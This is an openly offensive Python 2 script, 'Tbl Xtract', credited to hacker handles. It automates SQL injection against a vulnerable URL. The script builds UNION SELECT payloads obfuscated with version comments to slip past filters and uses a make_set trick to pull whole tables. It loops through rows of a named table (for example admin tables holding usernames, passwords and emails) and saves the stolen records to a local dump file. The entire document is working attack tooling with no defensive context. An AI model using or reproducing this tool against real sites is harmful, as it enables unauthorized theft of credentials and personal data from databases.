Tbl Xtract [Python] [VIRkid]

#Table Extractor Script
#Idea : Ch3rn0by1
#C0de : VIRkid fb.com/virkid36
# Greets to team Madleets
#Beta version
#Update 09.oct.2014
###################################

import urllib2,re,sys,urllib,argparse
parser=argparse.ArgumentParser(description="Data Dumping utility ./VIRkid")
parser.add_argument("Target",help="VULNERABLE url",type=str)
parser.add_argument('-c','--columns',help="Total Number of Columns",type=int)
parser.add_argument('-v','--vuln',help="Vulnerable Column",type=int)
parser.add_argument('-t','--table',help="Table name to extract e.g tbl_admin",type=str)
parser.add_argument('-n','--column_name',help="comma separated list of columns to extract e.g username,password,email",type=str)
parser.add_argument('-A','--Apostrophe',help="set to y to add Apostrophe at the start of query ",type=str)
parser.add_argument('-p','--POST',help="POST SQLi",type=str,default='GET')
parser.add_argument('-L','--limit',help="Limit Multiples of 5 (5X)",type=int)
args=parser.parse_args()

#Banner
def banner():

    print "\t\t*********************************************"
    print "\t\t*                                           *"
    print "\t\t*              Tbl Xtrcat                   *"
    print "\t\t*              .:VIRkid:.                   *"
    print "\t\t*       Usage: python script.py -help       *"
    print "\t\t*     ali ahmady , pHaNtOm_X ,Ch3rn0by1     *"
    print "\t\t*********************************************"
#Column Generator


def colc(num):
    comment="%23"
    num+=1
    cols=','.join([str(i) for i in xrange(1,num)])
    return cols+comment

#Query Generator

def qry(cols_t,vulnerable_column,table_name,limits,columns,apos=0):

    if apos=='y':

        un="' and 0 /*!12345union*/ /*!12345select*/ "
    else:
        un=" and 0 /*!12345union*/ /*!12345select*/ "

    t_columns=colc(cols_t)
    t_columns=' '+t_columns
    vcol=vulnerable_column

    dios="make_set(6,@:=0x0a,(/*!12345select*/(1)/*!12345frOm*/(/*!12345select*/ * /*!12345frOm*/ %s limit %d,%d)shit /*!12345where*/@:=make_set(511,@,0x3c6c693e,%s)),@)"%(table_name,limits,5000,columns)
    if cols_t==1 and vcol==1:
        retq=t_columns.replace(' 1%23',dios+'%23')


    elif vcol==1:
        retq=t_columns.replace('%d,'%vcol,dios+',')


    elif vcol==cols_t:
        retq=t_columns.replace(',%d%%23'%vcol,','+dios+'%23')


    else:
        retq=t_columns.replace(',%d,'%vcol,','+dios+',')

    furl=un+retq
    furl=furl.replace(' ','+').replace("'",'%27')
    return furl


#Record Extractor

def extractor(u,data):
    recs=[]
    req=urllib2.Request(u,data)
    req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0')
    f=urllib2.urlopen(req).read()
    r=re.findall('<li>,.+..?',f)

    if not r :
        print "\n[+] Table exhausted"
        sys.exit(0)

    x=r[0].replace('<li>','').strip().replace('</div>','').split(',,',999999)

    print "\n[+] Dumped : %d Records"%len(x)
    for each in x:
        each=each.replace(',','::')


        recs.append(each+'\n')
    return recs

try:
    t_site=args.Target

#limit count
    c=0
    banner()
    print "\n[*] Target : %s"%t_site
#Dump File
    dfname='dump-%s-%s-%s.txt'%(args.Target.replace("http://","").split("/",100)[0],args.table,args.column_name)
    print "\n[*] Dump File : ",dfname
    dump_file=open(dfname,'w')

#GET injection
    if args.POST=='GET':
        while True:


            data_dump=qry(args.columns,args.vuln,args.table,c,args.column_name,args.Apostrophe)
            u=t_site+data_dump

            c+=5000

            dump_file.writelines(extractor(u,None))
            if args.limit:
                if c>=args.limit:
                    print "\n[+] Limit Reached"
                    break
        dump_file.close()


#POST Injection
    elif args.POST!='GET':


        while True:


            data_dump=qry(args.columns,args.vuln,args.table,c,args.column_name,args.Apostrophe)
            u=t_site+data_dump
            Pdata=args.POST
            Pdata=Pdata.replace("Ij3ct",data_dump)


            dump_file.writelines(extractor(u,Pdata))
            c+=5000
            if args.limit:
                if c>=args.limit:
                    print "\n[+] Limit Reached"
                    break

    dump_file.close()


except TypeError:
    print "\n[-] Invalid Values OR no values provided for REQUIRED arguments"

except urllib2.HTTPError, e:
    print "\n[-] %s | Resource %s"%(e.code,e.msg)

except urllib2.URLError:
    print "\n[-] Unable to Connect to Target"


except IOError:
    print "[-] Unable to Create dump file"